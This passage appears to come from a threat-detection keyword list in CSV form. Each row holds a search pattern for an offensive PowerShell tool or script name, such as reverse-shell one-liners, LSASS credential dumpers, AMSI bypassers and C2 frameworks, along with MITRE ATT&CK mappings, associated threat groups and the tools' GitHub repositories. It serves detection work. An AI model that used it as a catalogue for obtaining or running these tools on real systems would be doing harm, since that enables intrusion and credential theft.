T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-PowerExtract*",".{0,1000}Invoke\-PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*Invoke-PowerOptionsWMI*",".{0,1000}Invoke\-PowerOptionsWMI.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-PowerShellHistoryCheck*",".{0,1000}Invoke\-PowerShellHistoryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-PowerShellIcmp*",".{0,1000}Invoke\-PowerShellIcmp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellIcmp.ps1*",".{0,1000}Invoke\-PowerShellIcmp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellIcmp.ps1*",".{0,1000}Invoke\-PowerShellIcmp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcp*",".{0,1000}Invoke\-PowerShellTcp.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PowerShellTcp*",".{0,1000}Invoke\-PowerShellTcp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellTcp.ps1*",".{0,1000}Invoke\-PowerShellTcp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLine*",".{0,1000}Invoke\-PowerShellTcpOneLine.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLine*",".{0,1000}Invoke\-PowerShellTcpOneLine.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLineBind*",".{0,1000}Invoke\-PowerShellTcpOneLineBind.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLineBind.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLineBind\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowershellTranscriptionCheck*",".{0,1000}Invoke\-PowershellTranscriptionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-PowerShellUdp*",".{0,1000}Invoke\-PowerShellUdp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellUdp.ps1*",".{0,1000}Invoke\-PowerShellUdp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellUdp.ps1*",".{0,1000}Invoke\-PowerShellUdp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellUdpOneLine*",".{0,1000}Invoke\-PowerShellUdpOneLine.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellUdpOneLine.ps1*",".{0,1000}Invoke\-PowerShellUdpOneLine\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellUdpOneLine.ps1*",".{0,1000}Invoke\-PowerShellUdpOneLine\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellWmi*",".{0,1000}Invoke\-PowerShellWmi.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellWmi.ps1*",".{0,1000}Invoke\-PowerShellWmi\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerThIEf*",".{0,1000}Invoke\-PowerThIEf.{0,1000}","offensive_tool_keyword","Invoke-PowerThIEf","An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.","T1027 - T1053 - T1114 - T1059 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/nettitude/Invoke-PowerThIEf","1","0","N/A","N/A","2","129","27","2018-09-12T11:26:06Z","2018-07-10T09:14:58Z" "*Invoke-PowerThIEf*",".{0,1000}Invoke\-PowerThIEf.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-PowerThIEf.ps1*",".{0,1000}Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-PPLDump*",".{0,1000}Invoke\-PPLDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Prasadhak*",".{0,1000}Invoke\-Prasadhak.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Prasadhak.ps1*",".{0,1000}Invoke\-Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PrintDemon*",".{0,1000}Invoke\-PrintDemon.{0,1000}","offensive_tool_keyword","Invoke-PrintDemon","This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.","T1204 - T1208 - T1216 - T1055 - T1203","TA0001 - TA0007 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-PrintDemon","1","1","N/A","N/A","2","198","42","2020-10-17T17:04:24Z","2020-05-15T05:14:49Z" "*Invoke-PrintNightmareCheck*",".{0,1000}Invoke\-PrintNightmareCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Privesc*",".{0,1000}Invoke\-Privesc.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*Invoke-Privesc*",".{0,1000}Invoke\-Privesc.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-PrivescAudit *",".{0,1000}Invoke\-PrivescAudit\s.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Invoke-PrivescAudit*",".{0,1000}Invoke\-PrivescAudit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-PrivescCheck*",".{0,1000}Invoke\-PrivescCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PrivescCheck*",".{0,1000}Invoke\-PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-PrivescCheck.ps1*",".{0,1000}Invoke\-PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*invokeprocesshunter*",".{0,1000}invokeprocesshunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-processhunter*",".{0,1000}invoke\-processhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*Invoke-ProcessPunisher*",".{0,1000}Invoke\-ProcessPunisher.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-ProcessScan*",".{0,1000}Invoke\-ProcessScan.{0,1000}","offensive_tool_keyword","Invoke-ProcessScan","This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.","T1059.001 - T1016 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/vysecurity/Invoke-ProcessScan","1","1","N/A","N/A","1","44","22","2017-06-05T12:19:25Z","2017-06-03T18:36:30Z" "*Invoke-ProcSpawn -Command *",".{0,1000}Invoke\-ProcSpawn\s\-Command\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-ProcSpawn*",".{0,1000}Invoke\-ProcSpawn.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*InvokePS1.bat*",".{0,1000}InvokePS1\.bat.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Invoke-ps2exe*",".{0,1000}Invoke\-ps2exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*Invoke-PSAmsiScan*",".{0,1000}Invoke\-PSAmsiScan.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" 